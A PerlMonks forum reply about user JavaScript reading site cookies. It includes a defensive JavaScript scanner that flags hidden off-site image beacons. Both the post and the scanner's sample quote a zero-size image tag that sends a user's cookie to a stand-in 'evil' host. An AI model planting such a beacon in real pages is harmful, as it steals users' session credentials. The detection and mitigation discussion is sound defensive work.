in reply to On JavaScript, mt2k, and security risks

the real JavaScript baddie is crazyinsomniac. he actually does read your PerlMonks cookie (at least he strips the password and uses only the username). currently, all that is done with it is to display the user's name on the page (something like "Hi! mdillon!") and add an "invisible" IMG to the page that is called with the monk's name as a URL param, but it would be trivial for another user with fewer scruples to copy crazyinsomniac's code and use it to grab an invisible image with the whole cookie as the URL param: <img width="0" height="0" src="http://i.am/evil/0.gif?cookie=mdillon%05asdf08f98as">
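A site operator can audit user-supplied or rendered markup for the pattern the post above describes: a hidden image fetched from another host with data in its query string. The following is an added example, not part of the original post and not PerlMonks code; the `SITE_HOST` value, the function names and the sample markup are assumptions made for illustration.

```javascript
// Added example: flag off-site images in user-supplied HTML that look like beacons.
// SITE_HOST and the sample markup are constructed for illustration.
const SITE_HOST = "www.perlmonks.org"; // assumption: the host serving the page

// Parse the attributes of one tag into a lower-cased name -> value map.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Return one finding per <img> loaded from another host, with the reasons it stands out.
function findBeaconImages(html, siteHost = SITE_HOST) {
  const findings = [];
  for (const tag of html.match(/<img\b[^>]*>/gi) || []) {
    const a = parseAttrs(tag);
    if (!a.src) continue;
    let url;
    try {
      url = new URL(a.src, `http://${siteHost}/`); // resolves relative paths
    } catch {
      continue; // unparseable src: nothing the browser would fetch
    }
    if (url.hostname === siteHost) continue; // same-site image, not a leak path
    const reasons = ["off-site host"];
    const tiny = ["0", "1"].includes(a.width) || ["0", "1"].includes(a.height);
    const styled = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(a.style || "");
    if (tiny || styled) reasons.push("hidden or zero-size");
    if (url.search.length > 1) reasons.push("query string carries data");
    findings.push({ host: url.hostname, params: [...url.searchParams.keys()], reasons });
  }
  return findings;
}

// Constructed sample: a benign same-site image plus the image quoted in the post.
const sample = `
<img src="/images/monk.gif" width="80" height="80">
<img width="0" height="0" src="http://i.am/evil/0.gif?cookie=mdillon%05asdf08f98as">`;
console.log(findBeaconImages(sample));
```

Images created by script at view time only appear in the rendered DOM, so a static scan like this has to be run on rendered output to catch them. Marking the session cookie `HttpOnly` removes it from `document.cookie` altogether.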

RE: RE: On JavaScript, mt2k, and security risks
by little (Curate) on Nov 07, 2000 at 15:07 UTC
    just b.t.w., when did you change your password last ? :-))

    Have a nice day
    All decision is left to your taste